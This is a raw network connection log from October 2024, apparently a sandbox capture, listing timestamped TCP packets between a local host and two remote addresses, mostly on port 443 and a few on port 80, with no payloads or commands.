Oct 27, 2024 17:11:11.248739958 CET	443	57764	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.248800039 CET	57764	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.248927116 CET	57764	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.248936892 CET	443	57764	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.248950958 CET	57764	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.248955965 CET	443	57764	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.251368046 CET	57769	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.251463890 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.251562119 CET	57769	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.251697063 CET	57769	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.251732111 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.252439022 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.252608061 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.252670050 CET	57762	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.252724886 CET	57762	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.252724886 CET	57762	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.252758980 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.252782106 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.254390955 CET	57770	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.254410028 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.254478931 CET	57770	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.254587889 CET	57770	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.254601002 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.271100998 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.271363974 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.271470070 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.271538019 CET	57765	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.271588087 CET	57765	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.271588087 CET	57765	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.271620989 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.271646976 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.271756887 CET	57766	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.271770954 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.272207022 CET	57766	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.272211075 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.273274899 CET	57771	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.273298979 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.273372889 CET	57771	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.273487091 CET	57771	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.273510933 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.405936003 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.406099081 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.406325102 CET	57766	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.406374931 CET	57766	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.406383991 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.406394005 CET	57766	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.406398058 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.408281088 CET	57772	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.408364058 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.408457994 CET	57772	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.408572912 CET	57772	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.408596039 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.640331030 CET	80	57767	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:11.640422106 CET	57767	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:11.971009016 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.971427917 CET	57768	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.971456051 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.971846104 CET	57768	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.971853018 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.998219967 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.001363993 CET	57769	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.001429081 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.002286911 CET	57769	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.002300024 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.003267050 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.003556013 CET	57771	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.003571033 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.003897905 CET	57771	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.003906965 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.015630007 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.015898943 CET	57770	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.015909910 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.016235113 CET	57770	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.016239882 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.103971004 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.104113102 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.104172945 CET	57768	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.104263067 CET	57768	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.104279041 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.104291916 CET	57768	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.104299068 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.106638908 CET	57773	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.106717110 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.106789112 CET	57773	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.106895924 CET	57773	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.106916904 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.134099007 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.134262085 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.134332895 CET	57769	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.134408951 CET	57769	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.134408951 CET	57769	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.134469032 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.134496927 CET	443	57769	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.135134935 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.135566950 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.135638952 CET	57771	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.135672092 CET	57771	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.135672092 CET	57771	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.135688066 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.135706902 CET	443	57771	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.136970997 CET	57774	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.137054920 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.137123108 CET	57774	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.137676954 CET	57774	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.137695074 CET	57775	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.137711048 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.137723923 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.137797117 CET	57775	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.137878895 CET	57775	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.137891054 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.146655083 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.146946907 CET	57772	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.146986961 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.147425890 CET	57772	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.147437096 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.150836945 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.151201963 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.151246071 CET	57770	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.151283026 CET	57770	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.151292086 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.151304007 CET	57770	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.151308060 CET	443	57770	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.153218985 CET	57776	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.153269053 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.153341055 CET	57776	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.153465033 CET	57776	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.153496981 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.279561043 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.279722929 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.279778957 CET	57772	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.279836893 CET	57772	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.279853106 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.279865026 CET	57772	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.279870987 CET	443	57772	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.282731056 CET	57777	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.282774925 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.282850981 CET	57777	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.283006907 CET	57777	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.283023119 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.866069078 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.866511106 CET	57775	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.866566896 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.866898060 CET	57775	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.866911888 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.880526066 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.880887985 CET	57773	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.880920887 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.881226063 CET	57773	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.881237984 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.889770985 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.890105963 CET	57774	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.890197039 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.890431881 CET	57774	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.890445948 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.894299030 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.894588947 CET	57776	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.894645929 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.894881964 CET	57776	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.894896030 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.995201111 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.995301008 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.995466948 CET	57775	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.995640039 CET	57775	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.995640039 CET	57775	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.995683908 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.995707989 CET	443	57775	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.998243093 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.998358965 CET	443	57778	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:12.998435974 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.998568058 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:12.998590946 CET	443	57778	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.012022018 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.012573004 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.012896061 CET	57777	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.012898922 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.012931108 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.012984991 CET	57773	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.013072014 CET	57773	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.013077021 CET	57773	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.013092041 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.013111115 CET	443	57773	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.013290882 CET	57777	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.013298035 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.015122890 CET	57779	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.015146971 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.015207052 CET	57779	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.015331030 CET	57779	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.015342951 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.023803949 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.024224997 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.024279118 CET	57774	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.024312019 CET	57774	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.024328947 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.024339914 CET	57774	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.024347067 CET	443	57774	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.024355888 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.024487972 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.025979996 CET	57776	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.026035070 CET	57780	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.026077032 CET	57776	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.026082993 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.026122093 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.026151896 CET	57776	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.026154041 CET	57780	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.026168108 CET	443	57776	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.026344061 CET	57780	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.026375055 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.028146029 CET	57781	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.028177023 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.028307915 CET	57781	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.028405905 CET	57781	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.028419971 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.141946077 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.142184019 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.142291069 CET	57777	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.142414093 CET	57777	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.142426968 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.142437935 CET	57777	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.142445087 CET	443	57777	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.144313097 CET	57782	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.144350052 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.144423962 CET	57782	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.144530058 CET	57782	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.144551039 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.150073051 CET	57767	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:13.150296926 CET	57783	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:13.156538963 CET	80	57783	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:13.156619072 CET	57783	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:13.156743050 CET	57783	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:13.157541990 CET	80	57767	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:13.157608032 CET	57767	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:13.163114071 CET	80	57783	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:13.754513979 CET	443	57778	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.755268097 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.755330086 CET	443	57778	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.755662918 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.755678892 CET	443	57778	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.761157036 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.763128996 CET	57779	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.763160944 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.763473034 CET	57779	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.763479948 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.774651051 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.775141001 CET	57781	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.775180101 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.775468111 CET	57781	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.775480986 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.786818981 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.791173935 CET	57780	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.791233063 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.791527033 CET	57780	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.791542053 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.886158943 CET	443	57778	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.886217117 CET	443	57778	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.886413097 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.886414051 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.886414051 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.891669989 CET	57784	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.891762018 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.891984940 CET	57784	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.892065048 CET	57784	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.892086983 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.892319918 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.892556906 CET	57782	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.892579079 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.892879009 CET	57782	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.892889023 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.892904043 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.893013000 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.893913984 CET	57779	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.893945932 CET	57779	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.893965006 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.893975973 CET	57779	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.893982887 CET	443	57779	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.895800114 CET	57785	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.895898104 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:13.895971060 CET	57785	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.898915052 CET	57785	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:13.898945093 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.027193069 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.027414083 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.027489901 CET	57782	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.028964996 CET	57782	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.029011011 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.029038906 CET	57782	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.029057026 CET	443	57782	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.032839060 CET	57786	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.032896996 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.034782887 CET	57786	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.038851976 CET	57786	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.038881063 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.043231964 CET	80	57783	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:14.044734955 CET	57783	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:14.133589983 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.133764982 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.133856058 CET	57780	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.174551964 CET	57780	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.174551964 CET	57780	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.174591064 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.174628019 CET	443	57780	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.191478014 CET	57787	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.191550970 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.191623926 CET	57787	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.191853046 CET	57787	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.191886902 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.193928957 CET	57778	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.193979979 CET	443	57778	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.202713013 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.202863932 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.206906080 CET	57781	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.314229012 CET	57781	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.314275026 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.314327955 CET	57781	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.314343929 CET	443	57781	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.500226021 CET	57788	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.500324965 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.500407934 CET	57788	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.500571012 CET	57788	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.500608921 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.619961023 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.622500896 CET	57784	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.622529984 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.622948885 CET	57784	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.622956991 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.652468920 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.673105955 CET	57785	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.673162937 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.673624039 CET	57785	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.673639059 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.755188942 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.755343914 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.755410910 CET	57784	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.755474091 CET	57784	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.755474091 CET	57784	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.755511045 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.755533934 CET	443	57784	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.758466005 CET	57789	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.758505106 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.758685112 CET	57789	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.758714914 CET	57789	443	192.168.2.4	13.107.246.51
